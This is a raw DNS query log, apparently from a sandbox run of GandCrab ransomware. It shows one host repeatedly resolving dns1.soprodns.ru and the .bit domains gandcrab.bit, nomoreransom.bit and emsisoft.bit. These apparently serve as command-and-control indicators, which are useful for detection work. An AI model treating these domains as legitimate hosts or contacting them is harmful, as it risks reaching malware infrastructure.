Sep 1, 2022 00:02:06.949732065 CEST	192.168.2.3	8.8.8.8	0x3f9e	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:07.982110023 CEST	192.168.2.3	8.8.8.8	0x3f9e	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:10.088450909 CEST	192.168.2.3	8.8.8.8	0x3f9e	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:11.685623884 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:11.706173897 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:11.726578951 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:11.746819973 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:11.767488003 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:12.846661091 CEST	192.168.2.3	8.8.8.8	0xfea3	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:13.892630100 CEST	192.168.2.3	8.8.8.8	0xfea3	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:14.908216953 CEST	192.168.2.3	8.8.8.8	0xfea3	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:14.995146036 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:15.015451908 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:15.036326885 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:15.057233095 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:15.078815937 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:15.420219898 CEST	192.168.2.3	8.8.8.8	0x80a9	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:16.408524990 CEST	192.168.2.3	8.8.8.8	0x80a9	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:16.468611002 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:16.489371061 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:16.509694099 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:16.532569885 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:16.558553934 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:16.953728914 CEST	192.168.2.3	8.8.8.8	0x731	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:17.000292063 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:17.026690006 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:17.049623013 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:17.069143057 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:17.089606047 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:17.824410915 CEST	192.168.2.3	8.8.8.8	0x84cb	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:18.368638039 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:18.389777899 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:18.409895897 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:18.428585052 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:18.458137989 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:18.825237036 CEST	192.168.2.3	8.8.8.8	0x49ea	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:19.409481049 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:19.430994987 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:19.450711966 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:19.472414017 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:19.492209911 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:19.849414110 CEST	192.168.2.3	8.8.8.8	0xeae8	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:19.932447910 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:19.952318907 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:19.973756075 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:19.994369984 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:20.014611959 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:20.450695992 CEST	192.168.2.3	8.8.8.8	0xc65d	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:21.440356970 CEST	192.168.2.3	8.8.8.8	0xc65d	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:22.031480074 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:22.051454067 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:22.069673061 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:22.089884996 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:22.108885050 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:22.575946093 CEST	192.168.2.3	8.8.8.8	0x4e9	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:23.581091881 CEST	192.168.2.3	8.8.8.8	0x4e9	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:24.596934080 CEST	192.168.2.3	8.8.8.8	0x4e9	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:24.728225946 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:24.749273062 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:24.770961046 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:24.792802095 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:24.814615965 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:25.179150105 CEST	192.168.2.3	8.8.8.8	0x7b7e	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:26.190792084 CEST	192.168.2.3	8.8.8.8	0x7b7e	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:26.252104998 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:26.273853064 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:26.294404984 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:26.312895060 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:26.333412886 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:26.695220947 CEST	192.168.2.3	8.8.8.8	0xd306	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:27.750152111 CEST	192.168.2.3	8.8.8.8	0xd306	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:27.858907938 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:27.883460045 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:27.905128002 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:27.969558001 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:27.993076086 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:29.601125002 CEST	192.168.2.3	8.8.8.8	0xefc8	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:32.371490955 CEST	192.168.2.3	8.8.8.8	0xefc8	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:32.404072046 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:32.423641920 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:32.443413973 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:32.467434883 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:32.489443064 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:32.867223024 CEST	192.168.2.3	8.8.8.8	0x4560	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:33.862488031 CEST	192.168.2.3	8.8.8.8	0x4560	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:34.417866945 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:34.435885906 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:34.463043928 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:34.497220993 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:34.518929958 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:34.851964951 CEST	192.168.2.3	8.8.8.8	0xbc32	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:35.437273979 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:35.455212116 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:35.476502895 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:35.496675014 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:35.516824961 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:35.859457016 CEST	192.168.2.3	8.8.8.8	0x55ac	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:35.995635033 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:36.017096996 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:36.035378933 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:36.053729057 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:36.072251081 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:36.459953070 CEST	192.168.2.3	8.8.8.8	0xf2bb	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:37.472609997 CEST	192.168.2.3	8.8.8.8	0xf2bb	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:38.497634888 CEST	192.168.2.3	8.8.8.8	0xf2bb	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:38.640486956 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:38.660218000 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:38.683294058 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:38.719558001 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:38.738598108 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:39.088742971 CEST	192.168.2.3	8.8.8.8	0x7eea	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:39.691652060 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:39.711365938 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:39.730597973 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:39.751533031 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:39.772185087 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:40.153419018 CEST	192.168.2.3	8.8.8.8	0x6727	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:41.172076941 CEST	192.168.2.3	8.8.8.8	0x6727	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:41.842334986 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:41.862104893 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:41.882664919 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:41.903320074 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:41.921899080 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:42.277318001 CEST	192.168.2.3	8.8.8.8	0x27ee	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:43.285449982 CEST	192.168.2.3	8.8.8.8	0x27ee	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:43.328716993 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:43.346779108 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:43.367193937 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:43.387386084 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:43.405654907 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:43.751919985 CEST	192.168.2.3	8.8.8.8	0xdd39	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:44.286156893 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:44.306859970 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:44.327136040 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:44.347197056 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:44.367091894 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:44.774935961 CEST	192.168.2.3	8.8.8.8	0x7cf8	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:44.827179909 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:44.846894979 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:44.867082119 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:44.887150049 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:44.909322977 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:45.564925909 CEST	192.168.2.3	8.8.8.8	0xa05d	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:46.551074982 CEST	192.168.2.3	8.8.8.8	0xa05d	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:46.632401943 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:46.656883001 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:46.678054094 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:46.696702003 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:46.717207909 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:47.066291094 CEST	192.168.2.3	8.8.8.8	0xb75e	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:47.102243900 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:47.119975090 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:47.139273882 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:47.160135031 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:47.180254936 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:48.143838882 CEST	192.168.2.3	8.8.8.8	0x9344	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:48.243660927 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:48.263272047 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:48.283085108 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:48.340517998 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:48.360270023 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:48.992279053 CEST	192.168.2.3	8.8.8.8	0x9098	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:49.039655924 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:49.105935097 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:49.126044989 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:49.146584034 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:49.211679935 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:50.544686079 CEST	192.168.2.3	8.8.8.8	0xc31f	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:52.608259916 CEST	192.168.2.3	8.8.8.8	0xc31f	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:52.628920078 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:52.648139954 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:52.669550896 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:52.691628933 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:52.764321089 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:53.163081884 CEST	192.168.2.3	8.8.8.8	0xddd1	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:53.207458973 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:53.228133917 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:53.250638962 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:53.276937962 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:53.296910048 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:53.660832882 CEST	192.168.2.3	8.8.8.8	0x1cca	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:54.678829908 CEST	192.168.2.3	8.8.8.8	0x1cca	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:54.715509892 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:54.735838890 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:54.755738974 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:54.777870893 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:54.805593014 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:55.193733931 CEST	192.168.2.3	8.8.8.8	0x7331	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:55.231367111 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:55.260307074 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
